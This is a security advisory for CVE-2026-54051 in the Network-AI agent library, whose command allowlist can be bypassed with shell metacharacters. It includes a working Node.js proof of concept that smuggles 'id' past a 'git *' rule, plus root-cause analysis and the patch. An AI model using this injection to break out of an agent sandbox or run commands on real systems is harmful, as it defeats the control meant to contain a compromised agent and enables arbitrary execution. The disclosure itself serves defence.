VYPR
← All advisories
Critical severity9.9NVD Advisory· Published Jun 19, 2026· Updated Jun 19, 2026

Network-AI: Improper Neutralization of Special Elements used in an OS Command

CVE-2026-54051

Description

Summary

The agent sandbox gates shell commands behind an allowlist (SandboxPolicy.isCommandAllowed), which THREAT_MODEL.md calls the main control against a compromised agent (Adversary 3.2). The allowlist glob-matches the whole command string, but ShellExecutor runs that string through /bin/sh -c. So any wildcard allow such as git *, npm * or node * also matches git status; , and a scoped command becomes arbitrary execution.

Root cause

Matching and execution disagree on what a command is. Lines pinned to 40e42d7 (lib/agent-runtime.ts is identical to the v5.8.5 tag).

  1. isCommandAllowed matches the full string, with no tokenizing and no metacharacter check:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L248-L260

  1. globMatch compiles * to .* and anchors it, so git * becomes ^git .*$ and matches git status; id:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L353-L360

  1. ShellExecutor.execute only checks isCommandAllowed, never requiresApproval:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L387-L391

  1. spawnCommand runs the approved string via /bin/sh -c, so ;, | and $(...) are interpreted by the shell:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L427-L431

Reachability

Any agent or caller allowed to run commands hits this when the operator allowlist has a wildcard entry. A plain git * is enough. No fresh-install precondition and no extra misconfiguration.

PoC

Installs network-ai@5.8.5, allows git *, then runs git status; id > marker. The allowlist accepts it and the injected id runs.

Run: npm i network-ai@5.8.5 && node poc-316.js

'use strict';
const os = require('os');
const fs = require('fs');
const path = require('path');
const { SandboxPolicy, ShellExecutor } = require('network-ai');

(async () => {
  const base = fs.mkdtempSync(path.join(os.tmpdir(), 'nai-poc-316-'));
  const marker = path.join(base, 'PWNED-316.txt');
  const policy = new SandboxPolicy({ basePath: base, allowedCommands: ['git *'] });
  const sh = new ShellExecutor(policy);

  const payload = `git status; id > ${marker}; echo INJECTED`;
  console.log('version:', require('network-ai/package.json').version);
  console.log('allowed:', policy.isCommandAllowed(payload));

  await sh.execute(payload);
  const ran = fs.existsSync(marker);
  console.log('injected id ran:', ran, ran ? fs.readFileSync(marker, 'utf8').trim() : '');
  console.log(ran ? 'VULNERABLE' : 'not reproduced');
  process.exit(ran ? 0 : 1);
})().catch(err => { console.error(err); process.exit(3); });

Output:

version: 5.8.5
allowed: true
injected id ran: true uid=501(alex) gid=20(staff) groups=20(staff),...
VULNERABLE

Impact

Arbitrary command execution as the orchestrator process. It defeats the one control meant to contain a compromised agent, so any agent with a single wildcard allow (git *, npm *, node *) can run anything. node * and npm * are direct code exec even without metacharacters.

Possible fix

Do not run agent commands through a shell. Parse to argv and spawn(file, args, { shell: false }), allowlist on the executable plus argument patterns, and reject shell metacharacters. Anchoring the regex alone is not enough; the whole-string match plus /bin/sh -c is the bug.

Patch

Fixed in v5.9.1 (commit 379f776). ShellExecutor now executes via spawn(file, args, { shell: false }) using a quote-aware parsed argv, so no shell is invoked. SandboxPolicy.isCommandAllowed and the new SandboxPolicy.tokenizeCommand reject any unquoted shell metacharacter (; & | $ ( ) < > { }` newline) or unterminated quote before the allowlist glob match; quoted metacharacters are preserved as literal argument data.

Remediation: upgrade to network-ai@5.9.1 or later. As defense in depth, avoid broad wildcard allowlist entries such as node * / npm * which are direct code execution by design.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Patches

Vulnerability mechanics

Root cause

"The allowlist glob-matches the full command string while the executor passes that same string to `/bin/sh -c`, so shell metacharacters bypass the allowlist."

Attack vector

An attacker who can supply a command string to an agent whose operator has configured a wildcard allowlist entry (e.g. `git *`, `npm *`, `node *`) can inject arbitrary shell commands. The allowlist glob-match accepts the full string because `git *` matches `git status; id`. The `ShellExecutor` then runs the string via `/bin/sh -c`, so shell metacharacters like `;` and `|` are executed. No additional misconfiguration is required beyond a single wildcard allowlist entry [ref_id=1][ref_id=2].

Affected code

The vulnerability is in `lib/agent-runtime.ts` (v5.8.5 tag, commit `40e42d7`). `SandboxPolicy.isCommandAllowed` (lines 248–260) glob-matches the full command string without tokenizing or checking for shell metacharacters. `globMatch` (lines 353–360) compiles `*` to `.*` and anchors the regex, so a pattern like `git *` matches `git status; id`. `ShellExecutor.execute` (lines 387–391) only calls `isCommandAllowed` and then `spawnCommand` (lines 427–431) passes the string to `/bin/sh -c`, where `;`, `|`, and `$()` are interpreted by the shell.

What the fix does

The patch in v5.9.1 (commit `379f776`) removes the shell invocation entirely. `ShellExecutor` now uses `spawn(file, args, { shell: false })` with a quote-aware parsed argv, so no shell is invoked. Additionally, `SandboxPolicy.isCommandAllowed` and the new `SandboxPolicy.tokenizeCommand` reject any unquoted shell metacharacter (`; & | $ \` ( ) < > { }` newline) or unterminated quote before the allowlist glob match; quoted metacharacters are preserved as literal argument data [ref_id=1][ref_id=2]. This closes the mismatch between the allowlist check and the execution engine.

Preconditions

  • configThe operator must have configured at least one wildcard allowlist entry (e.g. `git *`, `npm *`, `node *`)
  • authThe attacker must be able to supply a command string to the agent (e.g. as a compromised agent or authorized caller)

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.